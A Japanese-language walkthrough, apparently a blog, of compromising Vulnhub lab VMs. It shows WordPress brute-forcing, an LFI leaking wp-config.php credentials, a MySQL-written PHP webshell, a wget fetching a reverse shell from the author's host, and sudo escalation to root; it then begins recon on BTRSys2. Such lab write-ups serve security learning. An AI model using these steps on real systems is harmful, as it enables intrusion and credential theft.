https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css, Match: 'Version: 1.1.0' [+] twentyfifteen | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 2.6 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/, status: 500 | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.1' [+] twentyfourteen | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/ | Last Updated: 2020-03-31T00:00:00.000Z | [!] The version is out of date, the latest version is 2.8 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css | Style Name: Twenty Fourteen | Style URI: https://wordpress.org/themes/twentyfourteen/ | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/, status: 500 | | Version: 1.4 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css, Match: 'Version: 1.4' [+] twentythirteen | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/ | Last Updated: 2020-03-31T00:00:00.000Z | [!] The version is out of date, the latest version is 3.0 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css | Style Name: Twenty Thirteen | Style URI: https://wordpress.org/themes/twentythirteen/ | Description: The 2013 theme for WordPress takes us back to the blog, featuring a full range of post formats, each... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/, status: 500 | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css, Match: 'Version: 1.5' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] John Smith | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: Rss Generator (Passive Detection) [+] peter | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] john | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] elly | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] barry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] heather | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] garry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] harry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] scott | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] kathy | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] tim | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Tue May 12 03:35:34 2020 [+] Requests Done: 20974 [+] Cached Requests: 52 [+] Data Sent: 5.399 MB [+] Data Received: 3.296 MB [+] Memory used: 276.891 MB [+] Elapsed time: 00:00:43
とりあえずパスワードクラック狙ってみたけど、
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -U peter,john,elly,barry,heather,garry,harry,scott,kathy,tim -P /usr/share/wordlists/rockyou.txt (snip) [+] Performing password attack on Xmlrpc Multicall against 10 user/s [SUCCESS] - garry / football [SUCCESS] - harry / monkey [SUCCESS] - scott / cookie [SUCCESS] - kathy / coolgirl ^Cogress Time: 00:28:58 < > (675 / 172827) 0.39% ETA: ??:??:?? [!] Valid Combinations Found: | Username: garry, Password: football | Username: harry, Password: monkey | Username: scott, Password: cookie | Username: kathy, Password: coolgirl [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Tue May 12 04:38:01 2020 [+] Requests Done: 727 [+] Cached Requests: 5 [+] Data Sent: 226.524 KB [+] Data Received: 69.015 MB [+] Memory used: 1.379 GB [+] Elapsed time: 00:29:23 Scan Aborted: Canceled by User
長いのでやめた。
分かった中にはadminはいなかったので、テーマ等弄れず。
脆弱性プラグインが見つかれば、先に進めそうな気がするけど見つからんかったしなぁ。
とここで気づき↓
enumerate all plugins is not working · Issue #1222 · wpscanteam/wpscan
え、オプション付けないとplugin検出できないことがあるのか。
早速試行
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -e ap --plugins-detection aggressive _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ (snip) [+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:02:44 <===================================> (86467 / 86467) 100.00% Time: 00:02:44 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] advanced-video-embed-embed-videos-or-playlists | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/ | Latest Version: 1.0 (up to date) | Last Updated: 2015-10-14T13:52:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt | [!] Directory listing is enabled | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200 | | Version: 1.0 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt [+] akismet | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/ | Latest Version: 4.1.5 | Last Updated: 2020-04-29T13:02:00.000Z | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/, status: 403 | | The version could not be determined. [+] shortcode-ui | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/ | Last Updated: 2019-01-16T22:56:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt | [!] The version is out of date, the latest version is 0.7.4 | [!] Directory listing is enabled | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200 | | Version: 0.6.2 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt [+] two-factor | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/ | Latest Version: 0.5.2 | Last Updated: 2020-04-30T14:02:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/readme.txt | [!] Directory listing is enabled | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/, status: 200 | | The version could not be determined. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Tue May 12 03:54:35 2020 [+] Requests Done: 86518 [+] Cached Requests: 13 [+] Data Sent: 23.032 MB [+] Data Received: 11.735 MB [+] Memory used: 404.73 MB [+] Elapsed time: 00:03:10
プラグイン出た。
これらの4つのプラグインを検索すると「two-factor」は無し、「akismet」はバージョンが分からないので無視、「shortcode」はどれもバージョン的に刺さらなそうだった。
# searchsploit advanced video wordpress ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- WordPress Plugin Advanced Video 1.0 - Local File Inclusion | exploits/php/webapps/39646.py (snip)
LFIでやっていくしかない。
しかしこのexploitの使い方が分からず。
curlでやる。
# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php https://10.10.10.14:12380/blogblog/?p=280 # curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php https://10.10.10.14:12380/blogblog/?p=300
しかしやったところで謎URLが返ってくるのみ。
失敗かと思ったが、「/blogblog/」に戻るとcurlした分だけ謎jpegが投稿されている?
このポストされてる記事がどこにあるのか調べた結果。
「/wp-content/uploads/」にあった。
参考 [Where can I find the directory of all my posts/articles in WordPress? - Stack Overflow]
(https://stackoverflow.com/questions/42590267/where-can-i-find-the-directory-of-all-my-posts-articles-in-wordpress)
https://$IP:12380/blogblog/wp-content/uploads/
アクセスするとjpegをダウンロードできるので、curlで一つ落としてみる。
# curl -k -O https://10.10.10.14:12380/blogblog/wp-content/uploads/463030943.jpeg # file 463030943.jpeg 463030943.jpeg: PHP script, ASCII text
php?
# cat 463030943.jpeg <?php /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, and ABSPATH. You can find more information by visiting * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php} * Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'plbkac'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:'); define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2'); define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o'); define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO'); define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$'); define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D'); define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;'); define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each a unique * prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); define('WP_HTTP_BLOCK_EXTERNAL', true);
さっきのexploitの中身全然読んでなかったけど、LFIってこういうことだったのか。
アクセスしたファイルの中身をjpegファイルとしてテキストファイルに出力するということか。
とりあえず「wp-config.php」のおかげでmysqlにアクセスできそう。
wordpressにadminログインしてページ改ざんを目指す。
# mysql -h 10.10.10.14 -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 945 Server version: 5.7.12-0ubuntu1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL > show databases; +--------------------+ | Database | +--------------------+ | information_schema | | loot | | mysql | | performance_schema | | phpmyadmin | | proof | | sys | | wordpress | +--------------------+ 8 rows in set (0.001 sec) MySQL > use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [wordpress]> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 11 rows in set (0.001 sec) MySQL [wordpress]> select * from wp_users; +----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+ | 1 | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john | john@red.localhost | http://localhost | 2016-06-03 23:18:47 | | 0 | John Smith | | 2 | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly | Elly@red.localhost | | 2016-06-05 16:11:33 | | 0 | Elly Jones | | 3 | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter | peter@red.localhost | | 2016-06-05 16:13:16 | | 0 | Peter Parker | | 4 | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry | barry@red.localhost | | 2016-06-05 16:14:26 | | 0 | Barry Atkins | | 5 | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather | heather@red.localhost | | 2016-06-05 16:18:04 | | 0 | Heather Neville | | 6 | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry | garry@red.localhost | | 2016-06-05 16:18:23 | | 0 | garry | | 7 | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry | harry@red.localhost | | 2016-06-05 16:18:41 | | 0 | harry | | 8 | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott | scott@red.localhost | | 2016-06-05 16:18:59 | | 0 | scott | | 9 | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy | kathy@red.localhost | | 2016-06-05 16:19:14 | | 0 | kathy | | 10 | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim | tim@red.localhost | | 2016-06-05 16:19:29 | | 0 | tim | | 11 | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe | zoe@red.localhost | | 2016-06-05 16:19:50 | | 0 | ZOE | | 12 | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave | dave@red.localhost | | 2016-06-05 16:20:09 | | 0 | Dave | | 13 | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon | simon@red.localhost | | 2016-06-05 16:20:35 | | 0 | Simon | | 14 | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby | abby@red.localhost | | 2016-06-05 16:20:53 | | 0 | Abby | | 15 | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki | vicki@red.localhost | | 2016-06-05 16:21:14 | | 0 | Vicki | | 16 | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam | pam@red.localhost | | 2016-06-05 16:42:23 | | 0 | Pam | +----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+ 16 rows in set (0.001 sec)
wordpressのパスワードをリークできるのでパスワード解析できる形式に出力する。
MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users into outfile '/var/www/https/blogblog/wp-content/uploads/passwd.txt'; Query OK, 16 rows affected (0.010 sec)
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt John:$P$B7889EMq/erHIuZapMB8GEizebcIy9. Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
全員分出力したけどID的にjohnがadminぽいのでjohnのパスワードだけ分かれば良さそう。
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt | grep John > pass # john --wordlist=/usr/share/wordlists/rockyou.txt pass Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status incorrect (John) 1g 0:00:00:12 DONE (2020-05-12 06:04) 0.07961g/s 14721p/s 14721c/s 14721C/s ipod22..iloveafi Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed
これでwordpressにadmin権限でログインできたので、いつも通りAppearanc->Editorのやつをお好みで書き換える。
今回は「404.php」を書き換える。
「404.php」を丸ごと「/usr/share/webshells/php/php-reverse-shell.php」に書きかえる。
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php # vim reverse.php
と思ったけど、今回のwordpressはテーマの書き換えができないらしい。
なぜだ。
mysqlからwebshell仕込む方針に変えていく。
webshellを仕込む。
# mysql -h 10.10.10.14 -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 1013 Server version: 5.7.12-0ubuntu1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php'; Query OK, 1 row affected (0.001 sec)
reverse-shellをダウンロードする。
window 1 # python -m SimpleHTTPServer 80
window 2 # curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/shell.php?cmd=wget+10.10.10.3/reverse.php
window 1 # nc -nlvp 8080
window 2
curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/reverse.php
window 1
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 20:37:56 up 7:59, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" www-data@red:/$
shell getchu! 他のwordpressプラグインチェック方法
curl https://10.10.10.14:12380/blogblog/wp-content/plugins/ -k -s | html2text
## after shell getchu cronも見た。<br> kernel exploitも試した。<br> なかなか刺さらなかった。全然分からなかった。<br> 最後にコレ
www-data@red:/home$ cat /.bash_history cat /.bash_history exit free exit exit exit exit exit exit exit exit id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit exit exit exit exit whoami exit exit exit exit exit exit exit exit exit id exit top ps aux exit exit exit exit cat: peter/.bash_history: Permission denied top exit
「.bash_history」かぁ~~。<br> JKanodeにはsudo権限なかったけど、peterにはありました。
ssh peter@10.10.10.14
(snip) red% sudo -l
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter: Matching Defaults entries for peter on red: lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
red% sudo su
➜ peter ls
➜ peter id
uid=0(root) gid=0(root) groups=0(root)
➜ peter cd /root
➜ ~ ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ ~ cat flag.txt
<(Congratulations)>
.-'''''-.
|'-----'|
|-.....-|
| |
| |
,. | |
__.o o
"-. | |
.-O o "-.o O )_,._ | |
( o O o )--.-"
O o"-.'-----'
'--------' ( o O o)
----------
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜ ~ exit
## 終わり - 軽くrabbit holeを体験した気がする(まだ甘々か) - もしかして今までやってたwordpressのテーマ改ざんってあまりできない?
vulnhub BTRSys2 v2.1 雑記
BTRSys2
google driveからのダウンロードファイル解凍後のovfファイルが上手く動かなかった。
vulnhub.comのダウンロードファイルのovfは上手く動いてくれた。
ip取得が上手くいかなかったので、
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
サービス調査
# nmap -p- 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT Nmap scan report for 10.10.10.13 Host is up (0.00015s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT Nmap scan report for 10.10.10.13 Host is up (0.00051s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.3
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.3
# searchsploit vsftpd ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
特に無し。
# ftp 10.10.10.13 Connected to 10.10.10.13. 220 (vsFTPd 3.0.3) Name (10.10.10.13:root): 331 Please specify the password. Password: l530 Login incorrect. Login failed. ftp> ls 530 Please login with USER and PASS.
ログイン必要なので終了。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
このバージョン以前にも見たけど、Username Enumerationにしかexploit無いし精度低かった気がする。
終。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.13 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.13 + Target Hostname: 10.10.10.13 + Target Port: 80 + Start Time: 2020-05-11 07:30:36 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-3233: /icons/README: Apache default file found. + 7865 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-11 07:31:40 (GMT-4) (64 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
robots.txtが気になる。
# dirb http://10.10.10.13 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 11 07:32:16 2020 URL_BASE: http://10.10.10.13/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.13/ ---- + http://10.10.10.13/index.html (CODE:200|SIZE:81) ==> DIRECTORY: http://10.10.10.13/javascript/ + http://10.10.10.13/LICENSE (CODE:200|SIZE:1672) + http://10.10.10.13/robots.txt (CODE:200|SIZE:1451) + http://10.10.10.13/server-status (CODE:403|SIZE:299) ==> DIRECTORY: http://10.10.10.13/upload/ ==> DIRECTORY: http://10.10.10.13/wordpress/ ---- Entering directory: http://10.10.10.13/javascript/ ---- ==> DIRECTORY: http://10.10.10.13/javascript/jquery/ ---- Entering directory: http://10.10.10.13/upload/ ---- ==> DIRECTORY: http://10.10.10.13/upload/account/ ==> DIRECTORY: http://10.10.10.13/upload/admins/ ==> DIRECTORY: http://10.10.10.13/upload/framework/ ==> DIRECTORY: http://10.10.10.13/upload/include/ + http://10.10.10.13/upload/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/languages/ ==> DIRECTORY: http://10.10.10.13/upload/media/ ==> DIRECTORY: http://10.10.10.13/upload/modules/ ==> DIRECTORY: http://10.10.10.13/upload/page/ ==> DIRECTORY: http://10.10.10.13/upload/search/ ==> DIRECTORY: http://10.10.10.13/upload/temp/ ==> DIRECTORY: http://10.10.10.13/upload/templates/ ---- Entering directory: http://10.10.10.13/wordpress/ ---- + http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/ + http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42) ---- Entering directory: http://10.10.10.13/javascript/jquery/ ---- + http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394) ---- Entering directory: http://10.10.10.13/upload/account/ ---- ==> DIRECTORY: http://10.10.10.13/upload/account/css/ + http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/account/templates/ ---- Entering directory: http://10.10.10.13/upload/admins/ ---- ==> DIRECTORY: http://10.10.10.13/upload/admins/access/ ==> DIRECTORY: http://10.10.10.13/upload/admins/addons/ ==> DIRECTORY: 